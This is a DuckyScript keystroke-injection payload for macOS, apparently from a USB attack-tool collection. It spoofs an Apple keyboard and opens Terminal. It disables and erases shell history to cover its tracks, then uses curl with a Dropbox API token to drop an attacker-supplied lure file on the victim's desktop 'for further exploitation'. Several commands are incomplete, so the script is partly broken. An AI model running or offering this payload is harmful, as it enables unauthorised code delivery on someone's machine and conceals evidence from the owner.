REM This script can be used to download files from dropbox to a target MacOs Desktop. REM files downloaded to the desktop can be used to trigger more complex scripts for further exploitation REM Author: Narsty REM Title: Dropbox to Desktop Bomb REM Version 1.0 MacOs REM Category: Execution REM Replace the "<API ACCESS TOKEN HERE>" Placeholder with your actual Dropbox API token REM Replace "<DROPBOX URL HERE>" with the URL of the dropbox file REM Replace the "<CLICK ME.mp4>" placeholder REM with what you want the name of the file to be on the target desktop REM Must include file format (.jpeg .doc .txt .mp4) ID 05ac:021e Apple:Keyboard DELAY 500 GUI SPACE DELAY 500 STRING terminal DELAY 500 ENTER DELAY 500 STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash DELAY 500 ENTER DELAY 500 STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER ENTER DELAY 1000 STRING cd ~/Desktop ENTER DELAY 500 STRING echo 'ACCESS_TOKEN="<API ACCESS TOKEN HERE>"; DOWNLOAD_URL="<DROPBOX URL HERE>"; SAVE_PATH="$HOME/Desktop/<CLICK ME.mp4>"; curl -L -o "$SAVE_PATH" --header "Authorization: Bearer $ACCESS_TOKEN" "$DOWNLOAD_URL"' > DELAY 500 STRING chmod +x DELAY 500 STRING ./ DELAY 250 ENTER DELAY 7000 GUI w